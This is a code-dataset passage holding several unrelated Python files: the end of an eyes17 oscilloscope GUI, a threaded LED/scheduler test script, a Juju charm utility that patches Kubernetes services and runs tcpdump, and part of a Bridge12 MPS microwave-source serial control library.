'%6.1f'%(cap*1e12)\n\t\t\t\t\tself.CAP.setText(''+ ss +self.tr(' pF'))\n\t\t\t\telif cap < 1.0e-6:\n\t\t\t\t\tss = '%6.1f'%(cap*1e9)\n\t\t\t\t\tself.CAP.setText(''+ ss +self.tr(' nF'))\n\t\t\t\telif cap < 1.0e-3:\n\t\t\t\t\tss = '%6.1f'%(cap*1e6)\n\t\t\t\t\tself.CAP.setText(''+ ss +self.tr(' uF'))\n\t\texcept:\n\t\t\tself.comerr()\n\n\tdef measure_freq(self):\n\t\ttry:\n\t\t\tfr = self.p.get_freq()\n\t\t\thi = self.p.r2ftime('IN2','IN2')\n\t\texcept:\n\t\t\tself.comerr()\n\t\tif fr > 0:\t\n\t\t\tT = 1./fr\n\t\t\tdc = hi*100/T\n\t\t\tself.IN2.setText(u''+unicode(self.tr('%5.1fHz %4.1f%%')) %(fr,dc))\n\t\telse:\n\t\t\tself.IN2.setText(u''+self.tr('No signal'))\n\t\t\n\tdef msg(self, m):\n\t\tself.msgwin.setText(self.tr(m))\n\t\t\n\tdef comerr(self):\n\t\tself.msgwin.setText('' + self.tr('Error. Try Device->Reconnect'))\n\nif __name__ == '__main__':\n\timport eyes17.eyes\n\tdev = eyes17.eyes.open()\n\tapp = QApplication(sys.argv)\n\n\t# translation stuff\n\tlang=QLocale.system().name()\n\tt=QTranslator()\n\tt.load(\"lang/\"+lang, os.path.dirname(__file__))\n\tapp.installTranslator(t)\n\tt1=QTranslator()\n\tt1.load(\"qt_\"+lang,\n\t\tQLibraryInfo.location(QLibraryInfo.TranslationsPath))\n\tapp.installTranslator(t1)\n\n\tmw = Expt(dev)\n\tmw.show()\n\tsys.exit(app.exec_())\n\t\n", "sub_path": "expRVCEdeb/usr/share/eyes17/scope.py", "file_name": "scope.py", "file_ext": "py", "file_size_in_byte": 24382, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pyqtgraph.TextItem", "line_number": 129, "usage_type": "call"}, {"api_name": "pyqtgraph.TextItem", "line_number": 139, "usage_type": "call"}, {"api_name": "utils.makeResultColors", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.makeTraceColors", "line_number": 151, "usage_type": "call"}, {"api_name": "utils.makeHtmlColors", "line_number": 152, "usage_type": "call"}, {"api_name": "utils.sliderVert", "line_number": 159, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 161, "usage_type": "call"}, {"api_name": "pyqtgraph.GraphicsWindow", "line_number": 165, "usage_type": "call"}, {"api_name": "pyqtgraph.SignalProxy", "line_number": 167, "usage_type": "call"}, {"api_name": "pyqtgraph.TextItem", "line_number": 172, "usage_type": "call"}, {"api_name": "pyqtgraph.TextItem", "line_number": 175, "usage_type": "call"}, {"api_name": "pyqtgraph.InfiniteLine", "line_number": 178, "usage_type": "call"}, {"api_name": "pyqtgraph.InfiniteLine", "line_number": 182, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 280, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 282, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 295, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 297, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 302, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 314, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 317, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 330, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 333, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 349, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 380, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 477, "usage_type": "call"}, {"api_name": 
"eyes17.eyemath17.fit_sine", "line_number": 482, "usage_type": "call"}, {"api_name": "eyes17.eyemath17", "line_number": 482, "usage_type": "name"}, {"api_name": "eyes17.eyemath17.pi", "line_number": 490, "usage_type": "attribute"}, {"api_name": "eyes17.eyemath17", "line_number": 490, "usage_type": "name"}, {"api_name": "numpy.Inf", "line_number": 514, "usage_type": "attribute"}, {"api_name": "pyqtgraph.TextItem", "line_number": 534, "usage_type": "call"}, {"api_name": "eyes17.eyemath17.fit_sine", "line_number": 573, "usage_type": "call"}, {"api_name": "eyes17.eyemath17", "line_number": 573, "usage_type": "name"}, {"api_name": "eyes17.eyemath17.fft", "line_number": 585, "usage_type": "call"}, {"api_name": "eyes17.eyemath17", "line_number": 585, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 588, "usage_type": "call"}, {"api_name": "pyqtgraph.plot", "line_number": 589, "usage_type": "call"}, {"api_name": "pyqtgraph.TextItem", "line_number": 591, "usage_type": "call"}, {"api_name": "eyes17.eyemath17.eyes.open", "line_number": 835, "usage_type": "call"}, {"api_name": "eyes17.eyemath17.eyes", "line_number": 835, "usage_type": "attribute"}, {"api_name": "eyes17.eyemath17", "line_number": 835, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 836, "usage_type": "attribute"}, {"api_name": "os.path.path.dirname", "line_number": 841, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 841, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 841, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 850, "usage_type": "call"}]} +{"seq_id": "380034795", "text": "import time\nimport schedule\nimport threading\n\nactividad = False\n\n\ndef verde():\n\tpinRojo = 3 ## Pin del led rojo\n\tpinVerde = 2 ## Pin del led verde\n \n\tdigitalWrite(pinrojo,0) # Apagamos el led rojo\n\n\tdigitalWrite(pinVerde,1) # Encendemos el led verde\n\n\ndef rojo():\n\tpinRojo = 3 ## Pin del led rojo\n\tpinVerde = 2 ## Pin del led verde\n\n\tdigitalWrite(pinVerde,0) # Apagamos el led verde\n\tdigitalWrite(pinrojo,1) # Encendemos el led rojo\n\n\n\ndef MyThread1():\n\n\tglobal actividad\n\n\twhile True:\n\t\t\n\t\tif actividad:\n\t\t\tverde()\n\t\telse:\n\t\t\trojo()\n\t\t\n\t\tactividad = not actividad\n\ndef despertador():\n\tprint ('Activamos despertador')\n\ncontador = 0\nperiodo = 5\nglobal actividad\n\nt1 = threading.Thread(target=MyThread1, args=[])\nt1.start()\n\nschedule.every().day.at(\"16:41\").do(despertador)\n\nwhile True:\n\n\tstart = time.time()\n\n\tif contador % 1 == 0:\n\n\t\tschedule.run_pending()\n\t\tprint ('Tarea 1')\n\t\n\tif contador % 2 == 0:\n\t\tprint ('Tarea 2')\n\n\tif contador % 3 == 0:\n\t\tprint ('Tarea 3')\n\n\tcontador = contador + 1\n\n\tprint (actividad)\n\n\tif contador == 30:\n\t\tcontador =0\n\n\n\tend = time.time()\n\ttime_elapsed = end - start\n\ttime.sleep(periodo-time_elapsed)\n\n\n\n", "sub_path": "test_ciclico.py", "file_name": "test_ciclico.py", "file_ext": "py", "file_size_in_byte": 1169, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "threading.Thread", "line_number": 46, "usage_type": "call"}, {"api_name": "schedule.every", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "schedule.run_pending", "line_number": 57, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": 
"call"}]} +{"seq_id": "641710764", "text": "# Copyright 2021 Canonical Ltd.\n# See LICENSE file for licensing details.\n\nimport logging\nimport os\nimport time\nfrom typing import List, Set, Tuple, Optional\n\nimport kubernetes\nfrom ops.charm import CharmBase\nfrom ops.model import MaintenanceStatus\nfrom ops.pebble import ConnectionError\nfrom ops.framework import StoredState\nfrom ipaddress import IPv4Address\nimport subprocess\n\n\nclass PatchFailed(RuntimeError):\n \"\"\"Patching the kubernetes service failed.\"\"\"\n\n\nclass K8sServicePatch:\n \"\"\"A utility for patching the Kubernetes service set up by Juju.\n Attributes:\n namespace_file (str): path to the k8s namespace file in the charm container\n \"\"\"\n\n namespace_file = \"/var/run/secrets/kubernetes.io/serviceaccount/namespace\"\n\n @staticmethod\n def namespace() -> str:\n \"\"\"Read the Kubernetes namespace we're deployed in from the mounted service token.\n Returns:\n str: The current Kubernetes namespace\n \"\"\"\n with open(K8sServicePatch.namespace_file, \"r\") as f:\n return f.read().strip()\n\n @staticmethod\n def _k8s_service(\n app: str, service_ports: List[Tuple[str, int, int, str]]\n ) -> kubernetes.client.V1Service:\n \"\"\"Property accessor to return a valid Kubernetes Service representation for Alertmanager.\n Args:\n app: app name\n service_ports: a list of tuples (name, port, target_port) for every service port.\n Returns:\n kubernetes.client.V1Service: A Kubernetes Service with correctly annotated metadata and\n ports.\n \"\"\"\n ports = [\n kubernetes.client.V1ServicePort(\n name=port[0], port=port[1], target_port=port[2], protocol=port[3]\n )\n for port in service_ports\n ]\n\n ns = K8sServicePatch.namespace()\n return kubernetes.client.V1Service(\n api_version=\"v1\",\n metadata=kubernetes.client.V1ObjectMeta(\n namespace=ns,\n name=app,\n labels={\"app.kubernetes.io/name\": app},\n ),\n spec=kubernetes.client.V1ServiceSpec(\n ports=ports,\n selector={\"app.kubernetes.io/name\": app},\n ),\n )\n\n @staticmethod\n def set_ports(app: str, service_ports: List[Tuple[str, int, int, str]]):\n \"\"\"Patch the Kubernetes service created by Juju to map the correct port.\n Currently, Juju uses port 65535 for all endpoints. This can be observed via:\n kubectl describe services -n | grep Port -C 2\n At runtime, pebble watches which ports are bound and we need to patch the gap for pebble\n not telling Juju to fix the K8S Service definition.\n Typical usage example from within charm code (e.g. 
on_install):\n service_ports = [(\"my-app-api\", 9093, 9093), (\"my-app-ha\", 9094, 9094)]\n K8sServicePatch.set_ports(self.app.name, service_ports)\n Args:\n app: app name\n service_ports: a list of tuples (name, port, target_port) for every service port.\n Raises:\n PatchFailed: if patching fails.\n \"\"\"\n # First ensure we're authenticated with the Kubernetes API\n\n ns = K8sServicePatch.namespace()\n # Set up a Kubernetes client\n api = kubernetes.client.CoreV1Api(kubernetes.client.ApiClient())\n try:\n # Delete the existing service so we can redefine with correct ports\n # I don't think you can issue a patch that *replaces* the existing ports,\n # only append\n api.delete_namespaced_service(name=app, namespace=ns)\n # Recreate the service with the correct ports for the application\n api.create_namespaced_service(\n namespace=ns, body=K8sServicePatch._k8s_service(app, service_ports)\n )\n except kubernetes.client.exceptions.ApiException as e:\n raise PatchFailed(\"Failed to patch k8s service: {}\".format(e))\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass OaiCharm(CharmBase):\n \"\"\"Oai Base Charm.\"\"\"\n\n _stored = StoredState()\n\n def __init__(\n self,\n *args,\n tcpdump: bool = False,\n ports=None,\n privileged: bool = False,\n container_name=None,\n service_name,\n ):\n super().__init__(*args)\n\n self.ports = ports\n self.privileged = privileged\n self.container_name = container_name\n self.service_name = service_name\n\n event_mapping = {\n self.on.install: self._on_install,\n }\n if tcpdump:\n event_mapping[self.on.tcpdump_pebble_ready] = self._on_tcpdump_pebble_ready\n for event, observer in event_mapping.items():\n self.framework.observe(event, observer)\n\n self._stored.set_default(\n _k8s_stateful_patched=False,\n _k8s_authed=False,\n )\n\n def _on_install(self, _=None):\n if not self._stored._k8s_authed:\n kubernetes.config.load_incluster_config()\n self._stored._k8s_authed = True\n if not self._stored._k8s_authed:\n kubernetes.config.load_incluster_config()\n self._stored._k8s_authed = True\n if self.privileged:\n self._patch_stateful_set()\n K8sServicePatch.set_ports(self.app.name, self.ports)\n\n def _on_tcpdump_pebble_ready(self, event):\n self.update_tcpdump_service(event)\n\n def update_tcpdump_service(self, event):\n try:\n self._configure_tcpdump_service()\n if (\n self.config[\"start-tcpdump\"]\n and self.service_exists(\"tcpdump\", \"tcpdump\")\n and not self.is_service_running(\"tcpdump\", \"tcpdump\")\n ):\n self.start_service(\"tcpdump\", \"tcpdump\")\n elif (\n not self.config[\"start-tcpdump\"]\n and self.service_exists(\"tcpdump\", \"tcpdump\")\n and self.is_service_running(\"tcpdump\", \"tcpdump\")\n ):\n self.stop_service(\"tcpdump\", \"tcpdump\")\n except ConnectionError:\n logger.info(\"pebble socket not available, deferring config-changed\")\n event.defer()\n\n def _configure_tcpdump_service(self):\n container = self.unit.get_container(\"tcpdump\")\n container.add_layer(\n \"tcpdump\",\n {\n \"summary\": \"tcpdump layer\",\n \"description\": \"pebble config layer for tcpdump\",\n \"services\": {\n \"tcpdump\": {\n \"override\": \"replace\",\n \"summary\": \"tcpdump\",\n \"command\": f\"/usr/sbin/tcpdump -i any -w /pcap_{self.app.name}.pcap\",\n \"environment\": {\n \"DEBIAN_FRONTEND\": \"noninteractive\",\n \"TZ\": \"Europe/Paris\",\n },\n }\n },\n },\n combine=True,\n )\n\n def start_service(self, container_name=None, service_name=None):\n if not container_name:\n container_name = self.container_name\n if not service_name:\n service_name = 
self.service_name\n container = self.unit.get_container(container_name)\n logger.info(f\"{container.get_plan()}\")\n container.start(service_name)\n\n def stop_service(self, container_name=None, service_name=None):\n if not container_name:\n container_name = self.container_name\n if not service_name:\n service_name = self.service_name\n container = self.unit.get_container(container_name)\n container.stop(service_name)\n\n def is_service_running(self, container_name=None, service_name=None):\n if not container_name:\n container_name = self.container_name\n if not service_name:\n service_name = self.service_name\n container = self.unit.get_container(container_name)\n is_running = (\n service_name in container.get_plan().services\n and container.get_service(service_name).is_running()\n )\n logger.info(f\"container {self.container_name} is running: {is_running}\")\n return is_running\n\n def service_exists(self, container_name=None, service_name=None):\n if not container_name:\n container_name = self.container_name\n if not service_name:\n service_name = self.service_name\n container = self.unit.get_container(container_name)\n service_exists = service_name in container.get_plan().services\n logger.info(f\"service {service_name} exists: {service_exists}\")\n return service_exists\n\n def _patch_stateful_set(self) -> None:\n \"\"\"Patch the StatefulSet to include specific ServiceAccount and Secret mounts\"\"\"\n if self._stored._k8s_stateful_patched:\n return\n\n # Get an API client\n api = kubernetes.client.AppsV1Api(kubernetes.client.ApiClient())\n for attempt in range(5):\n try:\n self.unit.status = MaintenanceStatus(\n f\"patching StatefulSet for additional k8s permissions. Attempt {attempt+1}/5\"\n )\n s = api.read_namespaced_stateful_set(\n name=self.app.name, namespace=self.namespace\n )\n # Add the required security context to the container spec\n s.spec.template.spec.containers[1].security_context.privileged = True\n\n # Patch the StatefulSet with our modified object\n api.patch_namespaced_stateful_set(\n name=self.app.name, namespace=self.namespace, body=s\n )\n logger.info(\n \"Patched StatefulSet to include additional volumes and mounts\"\n )\n self._stored._k8s_stateful_patched = True\n return\n except Exception as e:\n self.unit.status = MaintenanceStatus(\n \"failed patching StatefulSet... 
Retrying in 10 seconds\"\n )\n time.sleep(5)\n\n @property\n def namespace(self) -> str:\n with open(\"/var/run/secrets/kubernetes.io/serviceaccount/namespace\", \"r\") as f:\n return f.read().strip()\n\n @property\n def pod_ip(self) -> Optional[IPv4Address]:\n return IPv4Address(\n subprocess.check_output([\"unit-get\", \"private-address\"]).decode().strip()\n )\n\n def search_logs(\n self, logs: Set[str] = {}, subsets_in_line: Set[str] = {}, wait: bool = False\n ) -> bool:\n \"\"\"\n Search list of logs in the container and service\n\n :param: logs: List of logs to be found\n :param: wait: Bool to wait until those logs are found\n \"\"\"\n if logs and subsets_in_line:\n raise Exception(\"logs and subsets_in_line cannot both be defined\")\n elif not logs and not subsets_in_line:\n raise Exception(\"logs or subsets_in_line must be defined\")\n\n found_logs = set()\n os.environ[\n \"PEBBLE_SOCKET\"\n ] = f\"/charm/containers/{self.container_name}/pebble.socket\"\n p = subprocess.Popen(\n f'/charm/bin/pebble logs {self.service_name} {\"-f\" if wait else \"\"} -n all',\n stdout=subprocess.PIPE,\n shell=True,\n encoding=\"utf-8\",\n )\n all_logs_found = False\n for line in p.stdout:\n if logs:\n for log in logs:\n if log in line:\n found_logs.add(log)\n logger.info(f\"{log} log found\")\n break\n\n if all(log in found_logs for log in logs):\n all_logs_found = True\n logger.info(\"all logs found\")\n break\n else:\n if all(subset in line for subset in subsets_in_line):\n all_logs_found = True\n logger.info(\"subset of strings found\")\n break\n p.kill()\n return all_logs_found\n", "sub_path": "oai-amf-operator/src/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 12180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 41, "usage_type": "name"}, {"api_name": "kubernetes.client.V1ServicePort", "line_number": 52, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 52, "usage_type": "attribute"}, {"api_name": "kubernetes.client.V1Service", "line_number": 59, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 59, "usage_type": "attribute"}, {"api_name": "kubernetes.client.V1ObjectMeta", "line_number": 61, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 61, "usage_type": "attribute"}, {"api_name": "kubernetes.client.V1ServiceSpec", "line_number": 66, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 66, "usage_type": "attribute"}, {"api_name": "kubernetes.client", "line_number": 42, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 73, "usage_type": "name"}, {"api_name": "kubernetes.client.CoreV1Api", "line_number": 92, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 92, "usage_type": "attribute"}, {"api_name": "kubernetes.client.ApiClient", "line_number": 92, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 102, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 106, "usage_type": "call"}, {"api_name": "ops.charm.CharmBase", "line_number": 109, "usage_type": "name"}, {"api_name": "ops.framework.StoredState", "line_number": 112, "usage_type": "call"}, {"api_name": "kubernetes.config.load_incluster_config", "line_number": 145, "usage_type": "call"}, 
{"api_name": "kubernetes.config", "line_number": 145, "usage_type": "attribute"}, {"api_name": "kubernetes.config.load_incluster_config", "line_number": 148, "usage_type": "call"}, {"api_name": "kubernetes.config", "line_number": 148, "usage_type": "attribute"}, {"api_name": "ops.pebble.ConnectionError", "line_number": 172, "usage_type": "name"}, {"api_name": "kubernetes.client.AppsV1Api", "line_number": 244, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 244, "usage_type": "attribute"}, {"api_name": "kubernetes.client.ApiClient", "line_number": 244, "usage_type": "call"}, {"api_name": "ops.model.MaintenanceStatus", "line_number": 247, "usage_type": "call"}, {"api_name": "ops.model.MaintenanceStatus", "line_number": 266, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 269, "usage_type": "call"}, {"api_name": "ipaddress.IPv4Address", "line_number": 278, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 279, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 277, "usage_type": "name"}, {"api_name": "ipaddress.IPv4Address", "line_number": 277, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 283, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 297, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 300, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 302, "usage_type": "attribute"}]} +{"seq_id": "572298787", "text": "import numpy as np\nimport socket\nimport time\nimport os\nimport subprocess\nimport sys\nfrom . import serverConfig\nimport serial.tools.list_ports\n\nHOST = serverConfig.HOST\nPORT = serverConfig.PORT\n\ninitializeOnStart = serverConfig.initializeOnStart\ndefaultSerialPort = serverConfig.defaultSerialPort\nserialDelay = serverConfig.serialDelay\n\nautoDetectSerialPort = serverConfig.autoDetectSerialPort\nsystemReadyString = serverConfig.systemReadyString\n\n\npath = os.path.abspath(__file__)\ndir_path = os.path.dirname(path)\n\ndef ampgain(gain = None):\n '''Advanced feature to adjust gain for calibration of MPS\n\n Args:\n gain (None, float, int): Amplifier gain in dBm\n\n Returns:\n float: if gain is None, returns the current amplifier gain value in dBm\n '''\n\n if gain is not None:\n gain = gain * 10\n gainString = str(int(gain))\n send_command('ampgain %s'%gainString)\n\n else:\n gainString = send_command('ampgain?', recv = True)\n gain = float(gainString) / 10.\n\n return gain\n\ndef ampstatus(ampState = None):\n ''' Query MPS microwave amplifier status\n\n +---------+----------------------+\n |ampState |Description |\n +=========+======================+\n |0 |Amplifier Off |\n +---------+----------------------+\n |1 |Amplifier On |\n +---------+----------------------+\n |2 |Amplifier Ext |\n +---------+----------------------+\n\n Returns:\n ampState (int): Amplifier status of MPS\n '''\n\n if ampState is not None:\n if ampState not in (0,1,2):\n raise ValueError('Invalid Amplifier State. 
Must be 0, 1, 2')\n        ampState = int(ampState)\n\n        ampStateString = str(ampState)\n        send_command('ampstatus %s'%ampStateString)\n    else:\n        ampStateString = send_command('ampstatus?',recv = True)\n        ampState = int(ampStateString)\n    return ampState\n\ndef amptemp():\n    ''' Query the MPS amplifier temperature\n\n    Returns:\n        ampTemp (float): Amplifier temperature in degrees C\n    '''\n\n    ampTempString = send_command('amptemp?',recv = True)\n    ampTemp = float(ampTempString) / 10.\n    return ampTemp\n\n\ndef close():\n    '''Close serial port\n    '''\n    send_command('_close_')\n\n    print('Closing serial socket...')\n\n    isMPSReady = systemReady()\n    if (isMPSReady == 0):\n        print('Serial socket closed')\n    else:\n        print('Failed to close serial socket')\n\ndef debug(debugMode = None):\n    '''Query/Set debug mode of MPS\n\n    Args:\n        debugMode (None, int): If None, query the debug mode. Otherwise set the debug mode.\n\n    Returns:\n        debugMode (int): If query, returns current debug mode of MPS\n    '''\n\n    if debugMode is not None:\n        if debugMode in (0,1):\n            send_command('debug %i'%debugMode)\n        else:\n            raise ValueError('Debug mode must be 0 or 1')\n    else:\n        debugModeString = send_command('debug?', recv = True)\n        debugMode = int(debugModeString)\n        return debugMode\n\ndef detectMPSSerialPort():\n    '''Return the serial port for the MPS\n\n    Returns:\n        str: MPS serial port. If the MPS serial port is not found, returns None.\n    '''\n\n    print('Automatically Detecting Serial Port...')\n    ports = list(serial.tools.list_ports.comports())\n    MPSDetected = False\n    for p in ports:\n        print(p)\n        if (p.vid == 9025 or p.vid == 10755):\n            MPSDetected = True\n            MPSPort = p.device\n            print('MPS Detected on port %s'%(MPSPort))\n    if MPSDetected:\n        serialPort = MPSPort\n    else:\n        print('Automatic detection failed.')\n        serialPort = None\n    return serialPort\n\ndef firmware():\n    '''Query the MPS firmware version\n\n    Returns:\n        firmwareVersion (str): Firmware version\n    '''\n    firmwareVersion = send_command('firmware?',recv = True)\n    return firmwareVersion\n\ndef flush():\n    '''Flush the MPS Serial Buffer\n    '''\n    send_command('_flush_')\n\ndef freq(freqValue = None):\n    ''' Set/Query Microwave Frequency\n\n    Args:\n        freqValue (int, float): Set Frequency in GHz, by default this parameter is None and the frequency is queried\n\n    Returns:\n        frequency in GHz\n\n    Example::\n\n        microwaveFrequency = freq() # Query Microwave Frequency\n\n        freq(9.4) # Set Microwave Frequency to 9.4 GHz\n\n    '''\n    max_freq = 100.\n    if freqValue is not None:\n        if not isinstance(freqValue,(float,int)):\n            raise ValueError('Frequency value must be a float or int')\n        if (freqValue > max_freq):\n            raise ValueError('Frequency value must be in units of GHz')\n        freqValue = float(freqValue)\n        kHz_freq = freqValue * 1.e6\n        str_freq = '%0.0f'%kHz_freq\n        \n        send_command('freq %s'%str_freq)\n\n    else: # Query the frequency\n        return_kHz_freq = send_command('freq?',recv = True)\n        return_freq = float(return_kHz_freq) / 1.e6 # convert to GHz\n        return return_freq\n\ndef id():\n    '''Query the instrument identification string of MPS\n\n    Returns:\n        idString (str): ID of instrument: \"Bridge12 MPS\"\n    '''\n    idString = send_command('id?',recv = True)\n    return idString\n\ndef in_waiting():\n    '''Return bytes in MPS serial port\n\n    Returns:\n        value (int): number of bytes at serial port\n    '''\n    value_string = send_command('_in_waiting_',recv = True)\n    value = int(value_string)\n    return value\n\ndef listPorts():\n    '''List the serial ports available. 
This function is for troubleshooting when the serial port of the MPS is unknown.\n\n    Returns:\n        portsAvailable (dict): Dictionary of Serial Ports. Key is serial port. Value is description.\n\n    Example::\n\n        portsAvailable = listPorts() # Return Dictionary of Serial Ports Available\n    '''\n\n    portsAvailable = {}\n    ports = list(serial.tools.list_ports.comports())\n    for p in ports:\n        print('*'*50)\n        print('serial port: ' + str(p.device))\n        print('description: ' + str(p.description))\n        portsAvailable[p.device] = p.description\n    print('*'*50)\n    return portsAvailable\n\ndef lockstatus(lockState = None,verifyOperateMode = True):\n    '''Set/Query the frequency lock, must be performed in operate mode\n\n    +---------+----------------------+\n    |lockState|Description           |\n    +=========+======================+\n    |0        |Disable Frequency Lock|\n    +---------+----------------------+\n    |1        |Enable Frequency Lock |\n    +---------+----------------------+\n\n    Args:\n        lockState (None, int): if lockState is not None, sets the lock state\n        verifyOperateMode (bool): If True, verifies that the operate mode is enabled before setting the lock state\n\n    Warning:\n        The frequency lock can only be enabled in operate mode (screen() returns 1).\n\n    Returns:\n        lockState (int): Frequency lock state of MPS\n\n    Example::\n\n        lockState = lockstatus() # Query the Frequency Lock Status\n\n        lockstatus(0) # Disable Frequency Lock\n        lockstatus(1) # Enable Frequency Lock\n\n    '''\n    if lockState is not None:\n        if lockState in (0,1):\n            if verifyOperateMode:\n                # Check for operate mode\n                screenState = screen()\n                if screenState != 2:\n                    raise ValueError('Screen State Must be Operate Mode for Lock Mode')\n                rfState = rfstatus()\n                if rfState != 1:\n                    raise ValueError('RF Output Must be enabled for lock Mode')\n            send_command('lockstatus %i'%lockState)\n\n        else:\n            raise ValueError('Lock State Not Valid')\n    else:\n        lockStateString = send_command('lockstatus?', recv = True)\n        lockState = int(lockStateString)\n        return lockState\n\n\ndef lockdelay(delay = None):\n    '''Set/Query lock delay in ms\n\n    Args:\n        delay (None, int, float): Frequency lock delay in ms\n\n    Returns:\n        delayReading (int): If delay is None, returns lock delay value\n\n    Example::\n\n        delay = lockdelay() # Query the Frequency Lock Delay in ms\n\n        lockdelay(100) # Set the Frequency Lock Delay to 100 ms\n\n    '''\n    minDelay = 100.\n    maxDelay = 500.\n\n    if delay is not None:\n        if isinstance(delay,(int,float)):\n            if (delay >= minDelay) and (delay <= maxDelay):\n                delay = int(delay)\n                send_command('lockdelay %i'%delay)\n            else:\n                raise ValueError('Lock delay must be greater than %i and less than %i ms'%(minDelay,maxDelay))\n        else:\n            raise ValueError('Lock delay must be int or float')\n    else:\n        lockReadingString = send_command('lockdelay?',recv = True)\n        lockReading = int(lockReadingString)\n        return lockReading\n\ndef lockstep(step = None):\n    '''Set/Query Lock frequency step in kHz\n\n    Args:\n        step (None, int, float): Frequency lock step in kHz\n\n    Returns:\n        stepReading (int): If step is None, returns current lock step value in kHz\n\n    Example::\n\n        step = lockstep() # Query the Lock Frequency Step in kHz\n\n        lockstep(20) # Set the Frequency Lock Step to 20 kHz\n\n    '''\n    minStep = 10.\n    maxStep = 50.\n    if step is not None:\n        if isinstance(step,(int,float)):\n            if (step >= minStep) and (step <= maxStep):\n                step = int(step)\n                send_command('lockstep %i'%step)\n            else:\n                raise ValueError('Frequency step must be greater than %i and less than %i kHz'%(minStep,maxStep))\n        else:\n            raise 
ValueError('Frequency step must be a float or integer')\n    else:\n        stepReadingString = send_command('lockstep?',recv = True)\n        stepReading = int(stepReadingString)\n\n        return stepReading\n\ndef open():\n    '''Initialize MPS serial port connection\n    '''\n    send_command('_init_')\n\n    isMPSReady = systemReady()\n\n    if (isMPSReady == 1):\n        print('System Ready')\n    else:\n        print('System failed to start')\n\ndef power(powerValue = None):\n    '''Set/Query Microwave Power\n\n    Args:\n        powerValue (None, int, float): Set Power in dBm, by default this parameter is None and the power is queried\n\n    Returns:\n        powerValue (float): Microwave power in dBm \n\n    Example::\n\n        powerValue = power() # Query Microwave Power\n\n        power(10) # Set microwave power to 10 dBm\n\n    '''\n    if powerValue is not None:\n        if not isinstance(powerValue,(float,int)):\n            raise ValueError('Power value must be a float or int')\n        powerValue = float(powerValue)\n        tenth_dB_power = powerValue * 10.\n        str_power = '%0.0f'%tenth_dB_power\n        \n        send_command('power %s'%str_power)\n\n    else: # Query the power\n        return_tenth_dB_power = send_command('power?',recv = True)\n        return_power = float(return_tenth_dB_power) / 10. # convert to dBm\n        return return_power\n\ndef rfstatus(rfState = None,verifyWaveguideStatus = True):\n    ''' Set/Query the RF status\n\n    +-------+---------------------------------+\n    |rfState|Description                      |\n    +=======+=================================+\n    |0      |Disable RF Output                |\n    +-------+---------------------------------+\n    |1      |Enable RF Output                 |\n    +-------+---------------------------------+\n    |2      |External Trigger Microwave Output|\n    +-------+---------------------------------+\n    \n    Args:\n        rfState (None, int): RF Status value\n        verifyWaveguideStatus (bool): Check if waveguide status is Enabled (True by default).\n\n    Returns:\n        rfStateReading (int): If rfState is None, returns the queried RF status\n\n    Warning:\n        The microwave output (rfstatus(1)) can only be enabled if the waveguide switch is set to DNP mode (wgstatus() returns 1).\n    \n\n    Example::\n\n        rfState = rfstatus() # Query the RF State\n\n        rfstatus(0) # Disable Microwave Output\n        rfstatus(1) # Enable Microwave Output\n        rfstatus(2) # Enable External Trigger of Microwave Output\n\n    '''\n    if rfState is not None:\n        if rfState in (0,1,2):\n            if verifyWaveguideStatus:\n                waveguideState = wgstatus()\n                if waveguideState == 1:\n                    send_command('rfstatus %i'%rfState)\n                else:\n                    raise ValueError('Waveguide Switch is Disabled (EPR Mode)')\n            else:\n                send_command('rfstatus %i'%rfState)\n        else:\n            raise ValueError('RF Status Not Valid')\n    else:\n        rfStateReadingString = send_command('rfstatus?',recv = True)\n        rfStateReading = int(rfStateReadingString)\n        return rfStateReading\n\ndef rfsweepdata():\n    '''Get data from RF sweep\n\n    Returns:\n        numpy.array: Tuning curve 